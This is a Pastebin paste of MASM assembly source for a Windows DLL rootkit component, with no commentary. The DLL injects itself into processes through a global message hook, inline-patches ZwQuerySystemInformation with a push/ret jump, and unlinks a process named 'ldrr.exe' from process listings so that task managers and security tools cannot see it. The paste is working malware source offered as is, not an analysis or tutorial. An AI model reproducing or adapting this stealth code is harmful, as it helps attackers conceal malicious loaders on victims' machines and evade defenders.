Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- .386p
- .model flat, stdcall
- option casemap:none
- ;===================================
- include \masm32\include\windows.inc
- include \masm32\m32lib\masm32.inc
- ;===================================
- includelib \masm32\lib\masm32.lib
- includelib \masm32\lib\kernel32.lib
- includelib \masm32\lib\user32.lib
- includelib \masm32\lib\ntdll.lib
- includelib \masm32\lib\advapi32.lib
- ;===================================
- externdef _imp__ExitProcess@4:PTR pr1
- ExitProcess equ <_imp__ExitProcess@4>
- externdef _imp__SetLastError@4:PTR pr1
- SetLastError equ <_imp__SetLastError@4>
- externdef _imp__lstrcmpiW@8:PTR pr2
- lstrcmpiW equ <_imp__lstrcmpiW@8>
- externdef _imp__WriteProcessMemory@20:PTR pr5
- WriteProcessMemory equ <_imp__WriteProcessMemory@20>
- externdef _imp__ReadProcessMemory@20:PTR pr5
- ReadProcessMemory equ <_imp__ReadProcessMemory@20>
- externdef _imp__ZwQuerySystemInformation@16:PTR pr4
- ZwQuerySystemInformation equ <_imp__ZwQuerySystemInformation@16>
- externdef _imp__SetWindowsHookExA@16:PTR pr4
- SetWindowsHookEx equ <_imp__SetWindowsHookExA@16>
- externdef _imp__UnhookWindowsHookEx@4:PTR pr1
- UnhookWindowsHookEx equ <_imp__UnhookWindowsHookEx@4>
- externdef _imp__RegEnumValueW@32:PTR pr8
- RegEnumValueW equ <_imp__RegEnumValueW@32>
- externdef _imp__MessageBoxW@16:PTR pr4
- MessageBox equ <_imp__MessageBoxW@16>
- include DeepKernel.ash
- far_jmp struct
- PushOp DB 068h
- PushArg DD ?
- RetOp DB 0c3h
- far_jmp ends
- .data?
- hDLL DD ?
- hHookMsg DD ?
- .data
- pZQSI DD ?
- OldCode DB 06h dup(?)
- FAR_JUMP far_jmp <?>
- wszLoaderName DB "l",0,"d",0,"r",0,"r",0,".",0,"e",0,"x",0,"e",0,0,0
- .code
- HideProcess proc ProcName:DWord, Tasks:DWord
- mov esi, DWord ptr [Tasks]
- @@Up:
- invoke lstrcmpiW, [esi+SYSTEM_PROCESSES.ProcessName.Buffer], [ProcName]
- cmp eax, 0h
- jz short @@Found
- mov ecx, DWord Ptr [esi]
- cmp ecx, 0h
- jz short @@End
- mov edi, esi
- add esi, ecx
- jmp short @@Up
- @@Found:
- mov edx, DWord Ptr [esi]
- add DWord Ptr [edi], edx
- @@End:
- ret
- HideProcess endp
- NewZQSI proc P1:DWord, P2:DWord, P3:DWord, P4:DWord
- LOCAL Bytes:DWord
- invoke WriteProcessMemory, INVALID_HANDLE_VALUE, [ZwQuerySystemInformation], offset OldCode, SizeOf OldCode, addr Bytes
- invoke ZwQuerySystemInformation, [P1], [P2], [P3], [P4]
- pusha
- invoke WriteProcessMemory, INVALID_HANDLE_VALUE, [ZwQuerySystemInformation], offset FAR_JUMP, SizeOf OldCode, addr Bytes
- cmp DWord Ptr [P1], 05h
- jnz @@End
- cmp eax, 03fffffffh
- ja @@End
- invoke HideProcess, offset wszLoaderName, [P2]
- @@End:
- popa
- ret
- NewZQSI endp
- HookProc proc Code: DWord, wParam: DWord, lParam: DWord
- mov eax, 0h
- ret
- HookProc endp
- SetHookZQSI proc
- LOCAL Bytes: DWord
- invoke ReadProcessMemory, INVALID_HANDLE_VALUE, [ZwQuerySystemInformation], addr OldCode, 06h, addr Bytes
- mov [FAR_JUMP.PushOp], 068h
- mov [FAR_JUMP.PushArg], offset NewZQSI
- mov [FAR_JUMP.RetOp], 0c3h
- invoke WriteProcessMemory,INVALID_HANDLE_VALUE, [ZwQuerySystemInformation], offset FAR_JUMP, sizeof far_jmp, addr Bytes
- ret
- SetHookZQSI endp
- LibMain proc hInstDLL:DWORD, reason:DWORD, unused:DWORD
- LOCAL hMutex: DWord
- LOCAL trId: DWord
- .if [reason] == DLL_PROCESS_ATTACH
- .if [hDLL] == NULL
- mov eax, [hInstDLL]
- mov [hDLL], eax
- mov eax, DWord Ptr [hInstDLL]
- mov DWord Ptr [hDLL], eax
- invoke SetWindowsHookEx, WH_GETMESSAGE, offset HookProc, [hDLL], NULL
- mov [hHookMsg], eax
- .endif
- invoke SetHookZQSI
- .elseif [reason] == DLL_PROCESS_DETACH
- invoke UnhookWindowsHookEx, [hHookMsg]
- .endif
- xor eax, eax
- inc eax
- ret
- LibMain Endp
- end LibMain
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
